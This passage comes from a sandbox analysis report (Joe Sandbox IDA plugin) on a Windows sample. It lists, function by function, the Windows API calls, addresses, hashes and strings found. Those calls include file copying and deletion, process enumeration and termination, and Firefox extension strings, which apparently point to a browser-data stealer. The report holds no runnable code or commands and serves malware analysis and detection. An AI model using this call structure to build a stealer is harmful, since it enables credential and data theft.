                                                  • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                  • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                                  APIs
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcatlstrcpy
                                                  • String ID: vI@$vI@
                                                  • API String ID: 3905823039-1245421781
                                                  • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                  • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                  • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                  • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                  • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                  • wsprintfW.USER32 ref: 00418D78
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocProcesswsprintf
                                                  • String ID: %hs
                                                  • API String ID: 659108358-2783943728
                                                  • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                  • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                  • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                  • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00832A10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                  • String ID:
                                                  • API String ID: 257331557-0
                                                  • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                  • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                  • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                  • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B2A548
                                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00B2A666
                                                  • lstrlen.KERNEL32(00000000), ref: 00B2A923
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B2A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B2A094
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B2A9AA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                  • String ID:
                                                  • API String ID: 257331557-0
                                                  • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                  • Instruction ID: e9c0e0f59c2b66e2e98ec9a1e1e25c46040771c83e4609b965bda93dbaf1cf49
                                                  • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                  • Instruction Fuzzy Hash: 07E10272910118ABCB04FBA4DD92DEEB379AF15701F709199F196720A1EF346B48CF62
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00832A10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                  • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                                  • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                  • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B2D6E8
                                                  • lstrlen.KERNEL32(00000000), ref: 00B2D8FF
                                                  • lstrlen.KERNEL32(00000000), ref: 00B2D913
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B2D992
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                  • Instruction ID: 9341116358c494c1cec591d54fa7fc7061f5c5701f869e48af5c7e10df73b813
                                                  • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                  • Instruction Fuzzy Hash: CA911472910114ABCB08FBA4DD96DEEB3B9AF15701F7051A9F146720A1EF346B48CF62
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00832A10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                  • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                                  • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                  • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B2DA68
                                                  • lstrlen.KERNEL32(00000000), ref: 00B2DC06
                                                  • lstrlen.KERNEL32(00000000), ref: 00B2DC1A
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B2DC99
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                  • Instruction ID: 8e9cb38c2f5e81779c5c6715653a3fe6bbceb0049ff11cf406f6744ebc835a24
                                                  • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                  • Instruction Fuzzy Hash: A4811372910214ABCB08FBA4DD96DEE73B9AF55301F7055ADF046620A1EF346B48CF62
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                  • API String ID: 998311485-3310892237
                                                  • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                  • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                  • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                  • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                  APIs
                                                  • memset.MSVCRT ref: 004194EB
                                                    • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                    • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                    • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                  • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                  • String ID:
                                                  • API String ID: 396451647-0
                                                  • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                  • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                  • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                  • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                  APIs
                                                  • memset.MSVCRT ref: 00B39752
                                                    • Part of subcall function 00B38FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B39785,00000000), ref: 00B38FC2
                                                    • Part of subcall function 00B38FB7: RtlAllocateHeap.NTDLL(00000000), ref: 00B38FC9
                                                    • Part of subcall function 00B38FB7: wsprintfW.USER32 ref: 00B38FDF
                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00B39812
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B39830
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B3983D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                  • String ID:
                                                  • API String ID: 3729781310-0
                                                  • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                  • Instruction ID: 49c8cef028a0f6d77732706ed54a4987d80e52d312f958b2901f5b321075877f
                                                  • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                  • Instruction Fuzzy Hash: C0313A75E41248EFDB14DFE0CC49BEDB7B9EF45700F204499F506AA184DBB46A84CB52
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                  • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                  • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • CloseHandle.KERNEL32(?), ref: 00418761
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 1066202413-0
                                                  • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                  • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                  • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                  • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 00B38931
                                                  • Process32First.KERNEL32(?,00000128), ref: 00B38945
                                                  • Process32Next.KERNEL32(?,00000128), ref: 00B3895A
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                  • CloseHandle.KERNEL32(?), ref: 00B389C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 1066202413-0
                                                  • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                  • Instruction ID: 72e6aa81063493dc56014cb9a3e7ada8627a4943e4a16e03174ab41fbfeb8921
                                                  • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                  • Instruction Fuzzy Hash: F3312F72941218ABCB24DF94DD45FEEB7B9EB45701F2041D9F10AA61A0DB346F44CF92
                                                  APIs
